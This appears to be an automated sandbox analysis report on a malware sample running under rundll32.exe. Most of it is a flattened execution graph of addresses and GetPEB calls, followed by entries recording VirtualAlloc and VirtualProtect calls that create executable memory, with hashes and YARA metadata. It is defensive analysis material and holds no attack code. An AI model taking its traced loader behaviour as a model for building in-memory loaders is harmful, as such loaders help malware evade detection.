1a2cfc 4052->4053 4054 1b02e1 GetPEB 4053->4054 4055 1a2d0e 4054->4055 4056 1ae092 4055->4056 4057 1ae0a5 4056->4057 4058 1a68ec GetPEB 4057->4058 4059 1ae130 4058->4059 4059->4040 4419 1a70ad 4424 1a70d5 4419->4424 4420 1a73d6 4422 1ab046 GetPEB 4420->4422 4421 1a73d4 4422->4421 4423 1a4a6f GetPEB 4423->4424 4424->4420 4424->4421 4424->4423 4425 1ad4fe GetPEB 4424->4425 4425->4424 4060 1a3523 4062 1a363f 4060->4062 4064 1a3677 4062->4064 4065 1aaf66 4062->4065 4069 1b1d13 4062->4069 4066 1aaf7c 4065->4066 4067 1a68ec GetPEB 4066->4067 4068 1ab00b 4067->4068 4068->4062 4070 1b1d29 4069->4070 4071 1a68ec GetPEB 4070->4071 4072 1b1de0 4071->4072 4072->4062 4426 1bc5a1 4428 1bc913 4426->4428 4427 1a598b GetPEB 4427->4428 4428->4427 4429 1a3c8e GetPEB 4428->4429 4430 1bca48 4428->4430 4431 1a5370 GetPEB 4428->4431 4432 1bca55 GetPEB 4428->4432 4433 1a8e39 GetPEB 4428->4433 4434 1b02e1 GetPEB 4428->4434 4429->4428 4431->4428 4432->4428 4433->4428 4434->4428 4435 1b7fa7 4436 1a96ca GetPEB 4435->4436 4437 1b811d 4436->4437 4438 1a96ca GetPEB 4437->4438 4439 1b812a 4438->4439 4440 1a96ca GetPEB 4439->4440 4441 1b8141 4440->4441 4444 1afdef 4441->4444 4445 1afe2b 4444->4445 4446 1aff22 4445->4446 4447 1aeadd GetPEB 4445->4447 4447->4445 4448 1ab8d8 4460 1abcfd 4448->4460 4450 1abe5f 4452 1abe61 4453 1ab340 GetPEB 4452->4453 4455 1abe79 4453->4455 4488 1b46f7 4455->4488 4458 1a5370 GetPEB 4458->4460 4459 1bc15b GetPEB 4459->4460 4460->4450 4460->4452 4460->4458 4460->4459 4461 1a9a4b GetPEB 4460->4461 4462 1b02e1 GetPEB 4460->4462 4463 1b38c2 4460->4463 4472 1aea16 4460->4472 4476 1a6ae5 4460->4476 4479 1a30e8 4460->4479 4461->4460 4462->4460 4469 1b3af1 4463->4469 4464 1af895 GetPEB 4464->4469 4465 1b3c12 4466 1a502c GetPEB 4465->4466 4468 1b3c10 4466->4468 4467 1a502c GetPEB 4467->4469 4468->4460 4469->4464 4469->4465 4469->4467 4469->4468 4470 1b2982 GetPEB 4469->4470 4492 1af481 4469->4492 4470->4469 4473 1aea33 4472->4473 4474 1a68ec GetPEB 4473->4474 4475 1aeace 4474->4475 4475->4460 4477 1a68ec GetPEB 4476->4477 4478 1a6b85 4477->4478 4478->4460 4481 1a33e2 4479->4481 4480 1a5370 GetPEB 4480->4481 4481->4480 4484 1a3412 4481->4484 4485 1b02e1 GetPEB 4481->4485 4487 1a3423 4481->4487 4496 1b144e 4481->4496 4500 1afff8 4481->4500 4486 1b6643 GetPEB 4484->4486 4485->4481 4486->4487 4487->4460 4489 1b470a 4488->4489 4490 1a68ec GetPEB 4489->4490 4491 1b479f 4490->4491 4491->4450 4493 1af491 4492->4493 4494 1a68ec GetPEB 4493->4494 4495 1af522 4494->4495 4495->4469 4497 1b1464 4496->4497 4498 1a68ec GetPEB 4497->4498 4499 1b14ee 4498->4499 4499->4481 4501 1b0032 4500->4501 4502 1a68ec GetPEB 4501->4502 4503 1b00e3 4502->4503 4503->4481 4507 1ae8dd 4508 1ae9c8 4507->4508 4509 1bc4a5 GetPEB 4508->4509 4514 1aea0a 4508->4514 4510 1ae9e0 4509->4510 4515 1a2eac 4510->4515 4513 1b02e1 GetPEB 4513->4514 4516 1a2ec9 4515->4516 4518 1a2fdf 4516->4518 4519 1b1a0b 4516->4519 4518->4513 4520 1b1a27 4519->4520 4521 1a68ec GetPEB 4520->4521 4522 1b1ab6 4521->4522 4522->4516 4073 1a3953 4074 1a39cb 4073->4074 4077 1afa3b 4074->4077 4078 1a68ec GetPEB 4077->4078 4079 1a39db 4078->4079 4080 1ac851 4087 1acb2e 4080->4087 4082 1acc39 4083 1ad54c GetPEB 4083->4087 4084 1acc3b 4104 1b3d29 4084->4104 4086 1a5370 GetPEB 4086->4087 4087->4082 4087->4083 4087->4084 4087->4086 4088 1a9a4b GetPEB 4087->4088 4089 1b02e1 GetPEB 4087->4089 4090 1bc15b 4087->4090 4088->4087 4089->4087 4091 1bc178 4090->4091 4092 1a4cc9 GetPEB 4091->4092 4093 1bc401 4092->4093 4094 1a4cc9 GetPEB 4093->4094 4095 1bc41b 4094->4095 4096 1a4cc9 GetPEB 4095->4096 4097 1bc430 4096->4097 4114 1af965 4097->4114 4100 1af965 GetPEB 4101 1bc467 4100->4101 4118 1adac8 4101->4118 4105 1b3d46 4104->4105 4106 1a5370 GetPEB 4105->4106 4107 1b3ef5 4106->4107 4122 1ae231 4107->4122 4110 1b02e1 GetPEB 4111 1b3f25 4110->4111 4112 1ae092 GetPEB 4111->4112 4113 1b3f3a 4112->4113 4113->4082 4115 1af97e 4114->4115 4116 1a68ec GetPEB 4115->4116 4117 1afa2c 4116->4117 4117->4100 4119 1adadb 4118->4119 4120 1a68ec GetPEB 4119->4120 4121 1adb7b 4120->4121 4121->4087 4123 1ae250 4122->4123 4124 1b36c4 GetPEB 4123->4124 4125 1ae26a 4124->4125 4125->4110 4126 1bbc4d 4134 1bbc65 4126->4134 4127 1a4a6f GetPEB 4127->4134 4128 1a2353 GetPEB 4128->4134 4130 1b189f GetPEB 4130->4134 4131 1bc125 4132 1bc127 4132->4131 4135 1ad3f5 GetPEB 4132->4135 4133 1af965 GetPEB 4133->4134 4134->4127 4134->4128 4134->4130 4134->4131 4134->4132 4134->4133 4136 1ad3f5 GetPEB 4134->4136 4137 1a6ca5 4134->4137 4135->4132 4136->4134 4141 1a6ccb 4137->4141 4138 1a6fc7 4140 1baebe GetPEB 4138->4140 4139 1a6fc5 4139->4134 4140->4139 4141->4138 4141->4139 4142 1a4a6f GetPEB 4141->4142 4144 1baebe 4141->4144 4142->4141 4145 1baef8 4144->4145 4146 1a68ec GetPEB 4145->4146 4147 1baf95 4146->4147 4147->4141 4152 1be740 4153 1be620 VirtualAlloc 4152->4153 4154 1be74d 4153->4154 4155 1a9846 4156 1a99a8 4155->4156 4157 1a4a6f GetPEB 4156->4157 4158 1a99bc 4156->4158 4161 1a99dc 4156->4161 4162 1a9772 4156->4162 4157->4156 4160 1a85b2 GetPEB 4158->4160 4160->4161 4163 1a978d 4162->4163 4164 1a68ec GetPEB 4163->4164 4165 1a9838 4164->4165 4165->4156 4169 1a0d7a 4180 1a14c8 4169->4180 4170 1a3c8e GetPEB 4170->4180 4171 1a1699 4176 1a502c GetPEB 4171->4176 4174 1a16b5 4175 1a5370 GetPEB 4175->4180 4176->4174 4180->4170 4180->4171 4180->4174 4180->4175 4182 1b02e1 GetPEB 4180->4182 4183 1b2982 4180->4183 4187 1ac017 4180->4187 4200 1bca55 4180->4200 4207 1a8e39 4180->4207 4211 1a502c 4180->4211 4215 1a6b9a 4180->4215 4182->4180 4184 1b2997 4183->4184 4185 1a68ec GetPEB 4184->4185 4186 1b2a3f 4185->4186 4186->4180 4188 1ac046 4187->4188 4190 1a4a6f GetPEB 4188->4190 4191 1ac6fd 4188->4191 4192 1ac70f 4188->4192 4197 1ad3f5 GetPEB 4188->4197 4198 1a502c GetPEB 4188->4198 4199 1a96ca GetPEB 4188->4199 4219 1afd1a 4188->4219 4223 1af895 4188->4223 4227 1ada03 4188->4227 4231 1ae13c 4188->4231 4190->4188 4196 1ad3f5 GetPEB 4191->4196 4192->4180 4196->4192 4197->4188 4198->4188 4199->4188 4201 1a96ca GetPEB 4200->4201 4202 1bcb39 4201->4202 4203 1ad4fe GetPEB 4202->4203 4204 1bcb81 4203->4204 4205 1b8f9b GetPEB 4204->4205 4206 1bcb9c 4205->4206 4206->4180 4208 1a8e67 4207->4208 4209 1b36c4 GetPEB 4208->4209 4210 1a8e8a 4209->4210 4210->4180 4212 1a5042 4211->4212 4213 1a68ec GetPEB 4212->4213 4214 1a50e5 4213->4214 4214->4180 4216 1a6bdf 4215->4216 4217 1a68ec GetPEB 4216->4217 4218 1a6c7e 4217->4218 4218->4180 4220 1afd46 4219->4220 4221 1a68ec GetPEB 4220->4221 4222 1afdd9 4221->4222 4222->4188 4224 1af8b1 4223->4224 4225 1a68ec GetPEB 4224->4225 4226 1af955 4225->4226 4226->4188 4228 1ada1f 4227->4228 4229 1a68ec GetPEB 4228->4229 4230 1adab7 4229->4230 4230->4188 4232 1ae182 4231->4232 4233 1a68ec GetPEB 4232->4233 4234 1ae212 4233->4234 4234->4188 4527 1b66fb 4541 1b6cc7 4527->4541 4528 1aeadd GetPEB 4528->4541 4529 1a58e8 GetPEB 4529->4541 4530 1b6ee6 4531 1bc4a5 GetPEB 4530->4531 4534 1b6eff 4531->4534 4532 1ae4f3 GetPEB 4532->4541 4533 1a96ca GetPEB 4533->4541 4548 1adf4a 4534->4548 4537 1b6ed9 4538 1a4a6f GetPEB 4538->4541 4539 1b02e1 GetPEB 4539->4537 4540 1bc4a5 GetPEB 4540->4541 4541->4528 4541->4529 4541->4530 4541->4532 4541->4533 4541->4537 4541->4538 4541->4540 4543 1b02e1 GetPEB 4541->4543 4544 1ac801 4541->4544 4543->4541 4545 1ac829 4544->4545 4546 1b36c4 GetPEB 4545->4546 4547 1ac849 4546->4547 4547->4541 4549 1adf66 4548->4549 4550 1b36c4 GetPEB 4549->4550 4551 1adf82 4550->4551 4551->4539 4235 1a5478 4242 1a5777 4235->4242 4237 1ad54c GetPEB 4237->4242 4238 1b3805 GetPEB 4238->4242 4239 1a58db 4240 1ae761 GetPEB 4240->4242 4241 1bb63c GetPEB 4241->4242 4242->4237 4242->4238 4242->4239 4242->4240 4242->4241 4243 1b6fa5 4242->4243 4244 1b6fc5 4243->4244 4245 1a68ec GetPEB 4244->4245 4246 1b7053 4245->4246 4246->4242 4247 1b2179 4252 1b242a 4247->4252 4248 1ab340 GetPEB 4248->4252 4249 1a5370 GetPEB 4249->4252 4250 1b24e6 4251 1a9a4b GetPEB 4251->4252 4252->4248 4252->4249 4252->4250 4252->4251 4253 1b02e1 GetPEB 4252->4253 4253->4252 4552 1b00fe 4553 1a5370 GetPEB 4552->4553 4554 1b0211 4553->4554 4559 1b3f43 4554->4559 4557 1b02e1 GetPEB 4558 1b0238 4557->4558 4560 1b3f53 4559->4560 4561 1a68ec GetPEB 4560->4561 4562 1b021f 4561->4562 4562->4557 4563 1a27f3 4564 1a2809 4563->4564 4565 1a68ec GetPEB 4564->4565 4566 1a289c 4565->4566 4265 1a8f63 4266 1a902d 4265->4266 4267 1a9006 4265->4267 4271 1b9665 4267->4271 4270 1afa3b GetPEB 4270->4266 4283 1b9bf5 4271->4283 4272 1a3c8e GetPEB 4272->4283 4273 1ad54c GetPEB 4273->4283 4274 1a4cc9 GetPEB 4274->4283 4275 1a74bf GetPEB 4275->4283 4277 1b9df7 4278 1a598b GetPEB 4277->4278 4280 1a9019 4278->4280 4279 1a5370 GetPEB 4279->4283 4280->4266 4280->4270 4281 1b02e1 GetPEB 4281->4283 4282 1a9a4b GetPEB 4282->4283 4283->4272 4283->4273 4283->4274 4283->4275 4283->4277 4283->4279 4283->4280 4283->4281 4283->4282 4284 1b0339 4283->4284 4285 1a68ec GetPEB 4284->4285 4286 1b03d6 4285->4286 4286->4283

                                                                      Executed Functions

                                                                      Function 001BEB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001BEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001BEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2091778944.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_1a0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: d4ec2c4b8d7ca32284ee0ef8aadd8eaa76017fb165e723c9a8639b3d5767411f
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 61C18875A002099FCB48CF98C590EEEB7B6BF88314F148159E9199B355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001BE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 41 1be620-1be66b call 1bea10 44 1be67a-1be6aa call 1be390 VirtualAlloc 41->44 45 1be66d-1be677 call 1bea10 41->45 45->44
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001BE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2091778944.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_1a0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: c244dc4ca5502cf1a60d3aeeee32a4874eb2545764dc38a8e80cb46f571af093
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 6A110060D08289DAEF01D7E894097FEBFB55B21704F044098D5457B282D7BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2836 Parent PID: 260 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:936
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 4298 59b8d8 4310 59bcfd 4298->4310 4300 59be61 4303 59b340 GetPEB 4300->4303 4301 59be5f 4305 59be79 4303->4305 4338 5a46f7 4305->4338 4307 595370 GetPEB 4307->4310 4309 5ac15b GetPEB 4309->4310 4310->4300 4310->4301 4310->4307 4310->4309 4311 599a4b GetPEB 4310->4311 4312 5a02e1 GetPEB 4310->4312 4313 5a38c2 4310->4313 4322 59ea16 4310->4322 4326 596ae5 4310->4326 4329 5930e8 4310->4329 4311->4310 4312->4310 4316 5a3af1 4313->4316 4314 59f895 GetPEB 4314->4316 4315 5a3c12 4317 59502c GetPEB 4315->4317 4316->4314 4316->4315 4318 5a3c10 4316->4318 4319 59502c GetPEB 4316->4319 4320 5a2982 GetPEB 4316->4320 4342 59f481 4316->4342 4317->4318 4318->4310 4319->4316 4320->4316 4323 59ea33 4322->4323 4324 5968ec GetPEB 4323->4324 4325 59eace 4324->4325 4325->4310 4327 5968ec GetPEB 4326->4327 4328 596b85 4327->4328 4328->4310 4333 5933e2 4329->4333 4330 595370 GetPEB 4330->4333 4333->4330 4334 593412 4333->4334 4335 5a02e1 GetPEB 4333->4335 4337 593423 4333->4337 4346 5a144e 4333->4346 4350 59fff8 4333->4350 4336 5a6643 GetPEB 4334->4336 4335->4333 4336->4337 4337->4310 4339 5a470a 4338->4339 4340 5968ec GetPEB 4339->4340 4341 5a479f 4340->4341 4341->4301 4343 59f491 4342->4343 4344 5968ec GetPEB 4343->4344 4345 59f522 4344->4345 4345->4316 4347 5a1464 4346->4347 4348 5968ec GetPEB 4347->4348 4349 5a14ee 4348->4349 4349->4333 4351 5a0032 4350->4351 4352 5968ec GetPEB 4351->4352 4353 5a00e3 4352->4353 4353->4333 4354 59e8dd 4355 59e9c8 4354->4355 4356 5ac4a5 GetPEB 4355->4356 4361 59ea0a 4355->4361 4357 59e9e0 4356->4357 4362 592eac 4357->4362 4360 5a02e1 GetPEB 4360->4361 4363 592ec9 4362->4363 4365 592fdf 4363->4365 4366 5a1a0b 4363->4366 4365->4360 4367 5a1a27 4366->4367 4368 5968ec GetPEB 4367->4368 4369 5a1ab6 4368->4369 4369->4363 3385 59c851 3392 59cb2e 3385->3392 3387 59cc39 3389 59cc3b 3425 5a3d29 3389->3425 3392->3387 3392->3389 3395 595370 3392->3395 3399 599a4b 3392->3399 3403 5a02e1 3392->3403 3407 59d54c 3392->3407 3411 5ac15b 3392->3411 3396 59538b 3395->3396 3435 594a6f 3396->3435 3398 5953fd 3398->3392 3398->3398 3400 599a72 3399->3400 3477 5a36c4 3400->3477 3404 5a02f3 3403->3404 3480 59d3f5 3404->3480 3408 59d563 3407->3408 3490 5acbab 3408->3490 3412 5ac178 3411->3412 3494 594cc9 3412->3494 3415 594cc9 GetPEB 3416 5ac41b 3415->3416 3417 594cc9 GetPEB 3416->3417 3418 5ac430 3417->3418 3498 59f965 3418->3498 3421 59f965 GetPEB 3422 5ac467 3421->3422 3502 59dac8 3422->3502 3426 5a3d46 3425->3426 3427 595370 GetPEB 3426->3427 3428 5a3ef5 3427->3428 3514 59e231 3428->3514 3431 5a02e1 GetPEB 3432 5a3f25 3431->3432 3518 59e092 3432->3518 3440 597015 3435->3440 3447 5968ec 3440->3447 3443 5990d2 3444 5990ec 3443->3444 3445 5968ec GetPEB 3444->3445 3446 594b22 3445->3446 3446->3398 3448 5969d8 3447->3448 3449 594b11 3447->3449 3453 59f797 3448->3453 3449->3443 3451 5969ee 3456 5aba51 3451->3456 3454 59f857 3453->3454 3460 5927ec GetPEB 3453->3460 3454->3451 3458 5aba71 3456->3458 3457 5abb6d 3457->3449 3458->3457 3461 59177c 3458->3461 3460->3454 3462 591905 3461->3462 3469 5a95b0 3462->3469 3465 591949 3467 59197a 3465->3467 3468 5aba51 GetPEB 3465->3468 3467->3457 3468->3467 3470 5a95c9 3469->3470 3471 5968ec GetPEB 3470->3471 3472 59192f 3471->3472 3472->3465 3473 59e5c0 3472->3473 3474 59e5d3 3473->3474 3475 5968ec GetPEB 3474->3475 3476 59e671 3475->3476 3476->3465 3478 5968ec GetPEB 3477->3478 3479 599a91 3478->3479 3479->3392 3481 59d408 3480->3481 3482 597015 GetPEB 3481->3482 3483 59d4e4 3482->3483 3486 593011 3483->3486 3487 59302c 3486->3487 3488 5968ec GetPEB 3487->3488 3489 5930c0 3488->3489 3489->3392 3491 5acbcc 3490->3491 3492 5968ec GetPEB 3491->3492 3493 59d5ae 3492->3493 3493->3392 3495 594ce1 3494->3495 3506 59ff2c 3495->3506 3499 59f97e 3498->3499 3500 5968ec GetPEB 3499->3500 3501 59fa2c 3500->3501 3501->3421 3503 59dadb 3502->3503 3504 5968ec GetPEB 3503->3504 3505 59db7b 3504->3505 3505->3392 3507 59ff45 3506->3507 3510 5ad7a6 3507->3510 3511 5ad7c1 3510->3511 3512 5968ec GetPEB 3511->3512 3513 594d40 3512->3513 3513->3415 3515 59e250 3514->3515 3516 5a36c4 GetPEB 3515->3516 3517 59e26a 3516->3517 3517->3431 3519 59e0a5 3518->3519 3520 5968ec GetPEB 3519->3520 3521 59e130 3520->3521 3521->3387 3522 593953 3523 5939cb 3522->3523 3526 59fa3b 3523->3526 3527 5968ec GetPEB 3526->3527 3528 5939db 3527->3528 3533 5abc4d 3534 5abc65 3533->3534 3536 594a6f GetPEB 3534->3536 3537 5ac127 3534->3537 3539 5ac125 3534->3539 3540 59f965 GetPEB 3534->3540 3542 59d3f5 GetPEB 3534->3542 3543 5a189f GetPEB 3534->3543 3544 596ca5 3534->3544 3551 592353 3534->3551 3536->3534 3537->3539 3541 59d3f5 GetPEB 3537->3541 3540->3534 3541->3537 3542->3534 3543->3534 3545 596ccb 3544->3545 3546 596fc7 3545->3546 3548 596fc5 3545->3548 3549 594a6f GetPEB 3545->3549 3559 5aaebe 3545->3559 3547 5aaebe GetPEB 3546->3547 3547->3548 3548->3534 3549->3545 3552 592374 3551->3552 3555 592684 3552->3555 3557 592682 3552->3557 3563 5a1eb2 3552->3563 3567 5a20dc 3552->3567 3570 5a0b97 3552->3570 3574 59e761 3555->3574 3557->3534 3560 5aaef8 3559->3560 3561 5968ec GetPEB 3560->3561 3562 5aaf95 3561->3562 3562->3545 3564 5a1ecb 3563->3564 3565 5968ec GetPEB 3564->3565 3566 5a1f6c 3565->3566 3566->3552 3568 5968ec GetPEB 3567->3568 3569 5a216b 3568->3569 3569->3552 3571 5a0bb0 3570->3571 3572 5968ec GetPEB 3571->3572 3573 5a0c47 3572->3573 3573->3552 3575 59e777 3574->3575 3576 5968ec GetPEB 3575->3576 3577 59e813 3576->3577 3577->3557 3578 5ae740 3579 5ae620 VirtualAlloc 3578->3579 3580 5ae74d 3579->3580 3587 599846 3589 5999a8 3587->3589 3588 594a6f GetPEB 3588->3589 3589->3588 3591 5999bc 3589->3591 3592 5999dc 3589->3592 3598 599772 3589->3598 3594 5985b2 3591->3594 3595 5985d5 3594->3595 3596 5968ec GetPEB 3595->3596 3597 598667 3596->3597 3597->3592 3599 59978d 3598->3599 3600 5968ec GetPEB 3599->3600 3601 599838 3600->3601 3601->3589 3602 595478 3604 595777 3602->3604 3605 59d54c GetPEB 3604->3605 3606 5958db 3604->3606 3607 59e761 GetPEB 3604->3607 3610 5ab63c 3604->3610 3614 5a3805 3604->3614 3618 5a6fa5 3604->3618 3605->3604 3607->3604 3611 5ab66c 3610->3611 3612 5968ec GetPEB 3611->3612 3613 5ab6ed 3612->3613 3613->3604 3615 5a3818 3614->3615 3616 5968ec GetPEB 3615->3616 3617 5a38b6 3616->3617 3617->3604 3619 5a6fc5 3618->3619 3620 5968ec GetPEB 3619->3620 3621 5a7053 3620->3621 3621->3604 4377 5a66fb 4392 5a6cc7 4377->4392 4378 59eadd GetPEB 4378->4392 4379 5958e8 GetPEB 4379->4392 4380 5a6ee6 4381 5ac4a5 GetPEB 4380->4381 4382 5a6eff 4381->4382 4398 59df4a 4382->4398 4383 5996ca GetPEB 4383->4392 4385 5a6ed9 4386 594a6f GetPEB 4386->4392 4388 5a02e1 GetPEB 4388->4385 4389 59e4f3 GetPEB 4389->4392 4390 5ac4a5 GetPEB 4390->4392 4392->4378 4392->4379 4392->4380 4392->4383 4392->4385 4392->4386 4392->4389 4392->4390 4393 5a02e1 GetPEB 4392->4393 4394 59c801 4392->4394 4393->4392 4395 59c829 4394->4395 4396 5a36c4 GetPEB 4395->4396 4397 59c849 4396->4397 4397->4392 4399 59df66 4398->4399 4400 5a36c4 GetPEB 4399->4400 4401 59df82 4400->4401 4401->4388 3629 590d7a 3641 5914c8 3629->3641 3633 591699 3636 59502c GetPEB 3633->3636 3634 5916b5 3635 595370 GetPEB 3635->3641 3636->3634 3641->3633 3641->3634 3641->3635 3642 5a02e1 GetPEB 3641->3642 3643 5a2982 3641->3643 3647 59c017 3641->3647 3660 5aca55 3641->3660 3667 598e39 3641->3667 3671 59502c 3641->3671 3675 593c8e 3641->3675 3679 596b9a 3641->3679 3642->3641 3644 5a2997 3643->3644 3645 5968ec GetPEB 3644->3645 3646 5a2a3f 3645->3646 3646->3641 3648 59c046 3647->3648 3650 59c6fd 3648->3650 3651 59c70f 3648->3651 3656 59d3f5 GetPEB 3648->3656 3658 594a6f GetPEB 3648->3658 3659 59502c GetPEB 3648->3659 3683 59fd1a 3648->3683 3687 59f895 3648->3687 3691 59da03 3648->3691 3695 59e13c 3648->3695 3699 5996ca 3648->3699 3655 59d3f5 GetPEB 3650->3655 3651->3641 3655->3651 3656->3648 3658->3648 3659->3648 3661 5996ca GetPEB 3660->3661 3662 5acb39 3661->3662 3702 59d4fe 3662->3702 3668 598e67 3667->3668 3669 5a36c4 GetPEB 3668->3669 3670 598e8a 3669->3670 3670->3641 3672 595042 3671->3672 3673 5968ec GetPEB 3672->3673 3674 5950e5 3673->3674 3674->3641 3676 593cb4 3675->3676 3677 5968ec GetPEB 3676->3677 3678 593d4c 3677->3678 3678->3641 3680 596bdf 3679->3680 3681 5968ec GetPEB 3680->3681 3682 596c7e 3681->3682 3682->3641 3684 59fd46 3683->3684 3685 5968ec GetPEB 3684->3685 3686 59fdd9 3685->3686 3686->3648 3688 59f8b1 3687->3688 3689 5968ec GetPEB 3688->3689 3690 59f955 3689->3690 3690->3648 3692 59da1f 3691->3692 3693 5968ec GetPEB 3692->3693 3694 59dab7 3693->3694 3694->3648 3696 59e182 3695->3696 3697 5968ec GetPEB 3696->3697 3698 59e212 3697->3698 3698->3648 3700 5968ec GetPEB 3699->3700 3701 599769 3700->3701 3701->3648 3703 5996ca GetPEB 3702->3703 3704 59d536 3703->3704 3705 5a8f9b 3704->3705 3708 5a8fd7 3705->3708 3706 5a90b4 3706->3641 3708->3706 3709 59eadd 3708->3709 3710 59eaf3 3709->3710 3713 5aafaf 3710->3713 3714 5aafc2 3713->3714 3715 5968ec GetPEB 3714->3715 3716 59eb4c 3715->3716 3716->3708 3717 5a2179 3721 5a242a 3717->3721 3719 5a24e6 3720 595370 GetPEB 3720->3721 3721->3719 3721->3720 3722 599a4b GetPEB 3721->3722 3723 5a02e1 GetPEB 3721->3723 3724 59b340 3721->3724 3722->3721 3723->3721 3725 59b356 3724->3725 3726 5968ec GetPEB 3725->3726 3727 59b3dd 3726->3727 3727->3721 4402 5a00fe 4403 595370 GetPEB 4402->4403 4404 5a0211 4403->4404 4409 5a3f43 4404->4409 4407 5a02e1 GetPEB 4408 5a0238 4407->4408 4410 5a3f53 4409->4410 4411 5968ec GetPEB 4410->4411 4412 5a021f 4411->4412 4412->4407 4413 5927f3 4414 592809 4413->4414 4415 5968ec GetPEB 4414->4415 4416 59289c 4415->4416 3736 598f63 3737 59902d 3736->3737 3738 599006 3736->3738 3742 5a9665 3738->3742 3741 59fa3b GetPEB 3741->3737 3750 5a9bf5 3742->3750 3743 593c8e GetPEB 3743->3750 3744 595370 GetPEB 3744->3750 3745 59d54c GetPEB 3745->3750 3746 594cc9 GetPEB 3746->3750 3748 5a9df7 3762 59598b 3748->3762 3750->3743 3750->3744 3750->3745 3750->3746 3750->3748 3752 599019 3750->3752 3753 599a4b GetPEB 3750->3753 3754 5a02e1 GetPEB 3750->3754 3755 5a0339 3750->3755 3758 5974bf 3750->3758 3752->3737 3752->3741 3753->3750 3754->3750 3756 5968ec GetPEB 3755->3756 3757 5a03d6 3756->3757 3757->3750 3759 5974d8 3758->3759 3760 5968ec GetPEB 3759->3760 3761 597564 3760->3761 3761->3750 3763 5959b9 3762->3763 3764 594cc9 GetPEB 3763->3764 3765 595c01 3764->3765 3772 5aade2 3765->3772 3768 595c48 3768->3752 3769 59e761 GetPEB 3770 595c68 3769->3770 3771 59e761 GetPEB 3770->3771 3771->3768 3773 5aae1e 3772->3773 3774 5968ec GetPEB 3773->3774 3775 595c3d 3774->3775 3775->3768 3775->3769 4417 5a819f 4429 5a8601 4417->4429 4418 5a880e 4420 59e761 GetPEB 4418->4420 4419 5ab63c GetPEB 4419->4429 4422 5a880c 4420->4422 4423 59d3f5 GetPEB 4423->4429 4424 59d54c GetPEB 4424->4429 4426 594a6f GetPEB 4426->4429 4427 5974bf GetPEB 4427->4429 4428 59b340 GetPEB 4428->4429 4429->4418 4429->4419 4429->4422 4429->4423 4429->4424 4429->4426 4429->4427 4429->4428 4430 59a25a 4429->4430 4434 5a1ac5 4429->4434 4431 59a28b 4430->4431 4432 5968ec GetPEB 4431->4432 4433 59a308 4432->4433 4433->4429 4435 5a1ad8 4434->4435 4436 5968ec GetPEB 4435->4436 4437 5a1b9a 4436->4437 4437->4429 3787 5a4012 3788 5a402f 3787->3788 3789 594a6f GetPEB 3788->3789 3791 5a4148 3789->3791 3790 5a418d 3791->3790 3795 595d63 3791->3795 3794 59d3f5 GetPEB 3794->3790 3799 595d84 3795->3799 3797 596716 3798 59d3f5 GetPEB 3797->3798 3801 59670f 3798->3801 3799->3797 3799->3801 3803 594a6f GetPEB 3799->3803 3807 59bf62 GetPEB 3799->3807 3809 5a2032 3799->3809 3813 599038 3799->3813 3816 595c8a 3799->3816 3820 5a280b 3799->3820 3824 5a11d8 3799->3824 3828 5a883c 3799->3828 3832 598c61 3799->3832 3801->3790 3801->3794 3803->3799 3807->3799 3810 5a2052 3809->3810 3811 5968ec GetPEB 3810->3811 3812 5a20c8 3811->3812 3812->3799 3814 5968ec GetPEB 3813->3814 3815 5990c5 3814->3815 3815->3799 3817 595cb6 3816->3817 3818 5968ec GetPEB 3817->3818 3819 595d50 3818->3819 3819->3799 3821 5a2838 3820->3821 3822 5968ec GetPEB 3821->3822 3823 5a28b5 3822->3823 3823->3799 3825 5a11eb 3824->3825 3826 5968ec GetPEB 3825->3826 3827 5a1293 3826->3827 3827->3799 3829 5a885b 3828->3829 3830 5968ec GetPEB 3829->3830 3831 5a88fe 3830->3831 3831->3799 3833 598c91 3832->3833 3834 5968ec GetPEB 3833->3834 3835 598d2e 3834->3835 3835->3799 3372 5af090 3373 5af0b5 3372->3373 3378 5ae620 3373->3378 3375 5af1bf 3381 5aeb40 VirtualProtect 3375->3381 3377 5af1f8 3379 5ae661 3378->3379 3380 5ae694 VirtualAlloc 3379->3380 3380->3375 3382 5aeb95 3381->3382 3383 5aede6 3382->3383 3384 5aedb8 VirtualProtect 3382->3384 3383->3377 